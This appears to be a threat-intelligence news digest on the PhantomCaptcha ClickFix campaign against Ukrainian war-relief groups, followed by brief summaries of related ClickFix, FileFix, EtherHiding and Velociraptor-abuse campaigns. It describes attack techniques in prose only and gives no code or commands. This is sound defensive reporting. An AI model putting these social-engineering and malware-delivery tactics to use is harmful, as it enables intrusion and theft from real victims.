- The attack involved a WebSocket Remote Access Trojan (RAT) capable of remote command execution and data exfiltration through base64-encoded JSON commands.
  First reported: 22.10.2025 16:37 · 2 sources, 2 articles
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
- The campaign was linked to a subsequent operation targeting users in Lviv, Ukraine, with adult-themed Android APKs or cloud storage tools acting as spyware.
  First reported: 22.10.2025 16:37 · 2 sources, 2 articles
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
- The WebSocket RAT was hosted on Russian infrastructure, and the adult-themed campaign may be related to Russia/Belarus source development.
  First reported: 22.10.2025 16:37 · 2 sources, 2 articles
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
- The PhantomCaptcha campaign used a malicious "I am not a robot" CAPTCHA challenge similar to those used by the COLDRIVER group.
  First reported: 22.10.2025 16:37 · 2 sources, 2 articles
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
- The PhantomCaptcha campaign began on October 8, 2025, targeting Ukrainian relief organizations with phishing emails.
  First reported: 22.10.2025 18:45 · 1 source, 1 article
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
-
The phishing emails contained a malicious PDF that directed victims to a fake Zoom site hosted on Russian infrastructure.
First reported: 22.10.2025 18:45 (1 source, 1 article)
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
The attack used a Cloudflare verification page to execute a PowerShell command, installing malware on victims' systems.
First reported: 22.10.2025 18:45 (1 source, 1 article)
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
The malware operated in three stages: a downloader script, a reconnaissance module, and a WebSocket-based RAT.
First reported: 22.10.2025 18:45 (1 source, 1 article)
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
The campaign's infrastructure was active for only one day, with backend servers remaining online to manage infected devices.
First reported: 22.10.2025 18:45 (1 source, 1 article)
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
The PhantomCaptcha campaign is linked to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services.
First reported: 22.10.2025 18:45 (1 source, 1 article)
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
Similar Happenings
Increased Use of ClickFix Attacks by Threat Actors
ClickFix attacks, where users are tricked into running malicious commands by copying code from a webpage, have become a significant source of security breaches. These attacks are used by various threat actors, including the Interlock ransomware group and state-sponsored APTs. Recent data breaches at Kettering Health, DaVita, City of St. Paul, and Texas Tech University Health Sciences Centers have been linked to ClickFix-style tactics. The attacks exploit user behavior and technical gaps in detection to evade security measures and compromise systems. They are delivered through SEO poisoning, malvertising, and other non-email vectors, making them harder to detect and prevent. Effective defense against ClickFix attacks requires browser-based detection and blocking to intercept these threats at the earliest opportunity.
UNC5142 Abuses Blockchain Smart Contracts to Spread Malware via Compromised WordPress Sites
A financially motivated threat actor, UNC5142, has been exploiting blockchain smart contracts to distribute information stealers such as Atomic, Lumma, Rhadamanthys, and Vidar on Windows and macOS systems. The attacks leverage compromised WordPress websites and a technique called 'EtherHiding' to hide malicious code on public blockchains. The campaign uses a multi-stage JavaScript downloader named CLEARSHORT to deliver malware, with the first stage interacting with a malicious smart contract on the BNB Smart Chain. The smart contract retrieves a landing page from an external server, which then employs social engineering tactics to infect the system. Google Threat Intelligence Group (GTIG) flagged about 14,000 web pages containing injected JavaScript associated with UNC5142, indicating a broad targeting of vulnerable WordPress sites. However, no activity has been observed since July 23, 2025.
Velociraptor DFIR Tool Abused in LockBit and Babuk Ransomware Campaigns
Threat actors, assessed to be China-based Storm-2603, have started using the Velociraptor digital forensics and incident response (DFIR) tool in ransomware attacks deploying LockBit and Babuk ransomware. The attackers exploited a privilege escalation vulnerability in an outdated version of Velociraptor to gain persistent access and control over virtual machines. The campaign involved creating local admin accounts, disabling security features, and using fileless PowerShell encryptors for data exfiltration and encryption. The ransomware deployed on Windows systems was identified as LockBit, while a Linux binary detected as Babuk ransomware was found on VMware ESXi systems. Storm-2603 initially exploited SharePoint vulnerabilities in July 2025 and deployed Warlock, LockBit, and Babuk ransomware on VMware ESXi servers in August 2025. Sophos CTU researchers first documented Velociraptor abuse by Storm-2603 on August 5, 2025. Storm-2603 used the ToolShell exploit to gain initial access and deployed an outdated version of Velociraptor (version 0.73.4.0) that is susceptible to a privilege escalation vulnerability (CVE-2025-6264) to enable arbitrary command execution and endpoint takeover. The group also used Smbexec to remotely launch programs using the SMB protocol and modified Active Directory (AD) Group Policy Objects (GPOs) to disable real-time protection. Storm-2603 established the infrastructure for the AK47 C2 framework in March 2025 and created the first prototype of the tool the next month. The group pivoted from LockBit-only deployment to dual LockBit/Warlock deployment in April 2025 and used the ToolShell exploit as a zero-day in July 2025. Storm-2603 demonstrated operational flexibility and sophisticated builder expertise using leaked and open-source ransomware frameworks.
FileFix Attack Evolves with Cache Smuggling Technique
A new variant of the FileFix social engineering attack uses cache smuggling to evade security software. This technique involves hiding a malicious ZIP archive within a browser's cache to bypass detection. The attack impersonates a Fortinet VPN Compliance Checker and tricks users into executing a PowerShell script through the Windows File Explorer address bar. The script extracts the malicious payload from the cache and executes it. This new variant was first observed by cybersecurity researcher P4nd3m1cb0y and detailed by Marcus Hutchins of Expel. The attack has been adopted by various threat actors, including ransomware groups. Additionally, a new ClickFix kit called the IUAM ClickFix Generator has been discovered, which automates the creation of ClickFix-style lures.
WordPress Sites Exploited for ClickFix Phishing Attacks
WordPress sites are being exploited to inject malicious JavaScript that redirects users to phishing pages. The attacks use a theme-related file to load a dynamic payload from a remote server, which includes a JavaScript file and a hidden iframe mimicking legitimate Cloudflare assets. The domain involved is part of a traffic distribution system (TDS) known as Kongtuke. The campaign highlights the need for securing WordPress sites and keeping software up-to-date. Additionally, a new phishing kit named IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges. This kit has been used to deploy information stealers like DeerStealer and Odyssey Stealer. The emergence of such tools lowers the barrier to entry for cybercriminals, enabling sophisticated, multi-platform attacks. A new ClickFix campaign employs cache smuggling to evade detection, using the browser's cache to store malicious data without downloading files or communicating with the internet. The attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.